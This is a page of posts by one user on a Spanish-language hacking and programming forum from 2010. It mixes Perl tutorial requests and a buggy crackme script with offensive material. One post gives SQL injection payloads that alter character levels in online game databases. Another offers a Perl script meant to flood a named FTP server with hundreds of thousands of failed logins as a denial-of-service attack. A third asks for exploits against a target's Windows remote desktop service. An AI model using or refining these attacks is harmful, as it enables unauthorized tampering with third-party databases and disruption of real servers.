| |
 Mostrar Temas
|
|
Páginas: 1 [2] 3
|
|
11
|
Seguridad Informática / Nivel Web / Pregunta Mssql inject.
|
en: 7 Mayo 2010, 02:39 am
|
|
Buenas,estaba revisando unas inyecciones sql para un juego ..
y e encontrado 2 tipos de inyecciones,en algunas webs funciona una y en otras funciona otra.
las 2 inyecciones son las siguientes :
' update character set clevel=400 where name = 'PHAMTOM' //Esta inyeccion me edita el nivel.
'x'; update character set clevel=400 where name = 'PHAMTOM' // esta inyeccion me edita el nivel.
yo sé que el " ; " sirve para terminar una sentencia , y poder empezar la otra pero no le veo explicación al " 'x' "
saludos.PHAMTOM
|
|
|
|
|
12
|
Programación / Scripting / Manual de modulo LWP en perl.
|
en: 19 Abril 2010, 07:51 am
|
|
Buenas,abro este post,porq sobre modulo LWP solo encontre en ingles documentación , preguntaba si alguien tiene a mano , algun tutorial sobre el modulo LWP en perl , en español que sea bueno , muchisimas gracias.
PHAMTOM
|
|
|
|
|
13
|
Seguridad Informática / Nivel Web / Pregunta información sobre las cabeceras y los metodos.
|
en: 7 Abril 2010, 02:31 am
|
|
Buenas, me surgio una duda ,después de leer un manual de http y los metodos , quisiera saber , como hacer para saber , si el metodo PUT o Delete estan activos, estuve viendo algo de el metodo OPTIONS q justamente , sirve para eso , y desde la terminal.. para informarme de los metodos http , hago lo siguiente.. "ESTOY EN UBUNTU LINUX.
telnet WEB PUERTO
OPTIONS HTTP/1.1
Quisiera saber , si esta consulta http esta bien y supuestamente,si el metodo OPTIONS esta abilitado , me devolveria información.. saludos.
PHAMTOM
|
|
|
|
|
15
|
Programación / Scripting / Perl comprobacion de archivos webs.
|
en: 10 Marzo 2010, 17:48 pm
|
|
Buenas tardes, podria pedir un ejemplo de como verificar un archivo existente en una pagina web con perl y la biblioteca LWP , ejemplo
quiero verificar que un archivo.php , exista en una pagina web o no de esta forma
miweb.com/ejemplo.php
Quiero verificar con LWP si el archivo ejemplo.php existe y si existe , imprimir con un print "OK"; y de lo contrario Print "No";
Saludos,muchas gracias de antemano.
PHAMTOM
|
|
|
|
|
16
|
Programación / Scripting / Ftp en perl !
|
en: 8 Marzo 2010, 21:38 pm
|
Buenas,estaba escribiendo un programa , para un ftp que es vulnerable a multriples conexiones fallidas, pero no me funciona muy bien , aca esta el codigo , aver si podeis encontrar el error #Logo
print q(
Flood ftp
);
use Net::FTP;
#Create user and pass
my $contador=0;
my $userpass="AAAAAA";
do
{
print("Intentos : $contador");
$userpass x 1;
$contador++;
my $ftp = Net::FTP->new("ftp.jamaikamu.com") or die("No se pudo conectar al servidor: $!");
$ftp->login($userpass,$userpass);
print("Login incorrecto");
#ACCIONES QUE QUEREMOS EJECUTAR EN EL SERVIDOR
$ftp->quit or die("No se puedo desconectar del servidor: $!");
print("Intentos : $contador");
} until($contador > 600000); Supuestamente,esto tendria que conectarse al ftp ftp.jamaikamu.com , multriples veces , con un password fallido , que va a ser el $userpass . No me anda ni el contador, asique no sé,estare haciendo todo mal,antes de seguir mentiendo mano.  es algo parecido a un D.o.S |
|
|
|
|
17
|
Programación / Scripting / Manuales de sockets en perl?.-
|
en: 8 Marzo 2010, 19:10 pm
|
|
Buenas a todos, les comento , bueno el tema es el siguiente, e buscado y buscando manuales de sockets bien explicados de perl , en internet y los que veo estan en ingles,y uno que vi bueno que estaba en idioma ingles,use el traductor de google, para traducirlo pero tenia un flash, que exigia un registro , cuando inciaba la pagina,entonces el traductor no pudo traducirme la pagina y ingles no sé.
Luego vi uno de vengador de las sombras,pero el tema socket, lo pasa muy por arriba,habla un poco sobre ellos,pero no pude comprender en su totalidad los sockets.-
Quisiara saber si alguien tiene una pagina en español,sobre sockets bien explicados , o un pdf o algo así , muchisimas gracias de antemano ,les dejo un abrazo.-
PHAMTOM : )
|
|
|
|
|
18
|
Programación / Scripting / [Problema]Con script en perl.
|
en: 5 Marzo 2010, 04:05 am
|
Buenas,me estoy iniciando en el mundo de la programación en perl , y me surgio un problema al hacer una especie de "CRACKME". El tema es que cuando , el password se comprueba,da siempre resultado correcto.. El codigo del mismo es : #!/usr/bin/perl
print("Escribe el password : ");
$pass=<STDIN>;
system("cls");
if($pass=="hola")
{
print("Password correcto\n\n");
}
else
{
print("Password incorrecto\n\n");
} Aunque en <STDIN> entre askdjasdjkhasd, el password me da correcto :'(.. Tambien probe con : #!/usr/bin/perl
print("Escribe el password : ");
$pass=<STDIN>;
$contador=1;
# no le presteis atencion al contador feo.
do
{
$contador++;
print("\nCargando..");
system("cls");
}until($contador == 20);
system("cls");
if($pass!="hola")
{
print("Password incorrecto\n\n");
}
else
{
print("Password correcto\n\n");
}
Gracias de antemano, saludos : ) .. MOTMAHP |
|
|
|
|
20
|
Seguridad Informática / Hacking / Vulnerabilidad en el servicio de windows escritorio remoto?
|
en: 28 Febrero 2010, 02:44 am
|
Buenas,en mi objetivo,e encontrado aparte del servidor http, que tiene el servicio de escritorio remoto de windows,por lo que e leido,se puede atacar D.O.S por ese servicio , e buscado exploits y no e encontrado,ahora la pregunta es si hay algun exploit para este servicio o alguna forma de ataque ,saludos y gracias de antemano..  3389/tcp open microsoft-rdp Microsoft Terminal Service PHAMTOM |
|
|
|
|
|
| |
|
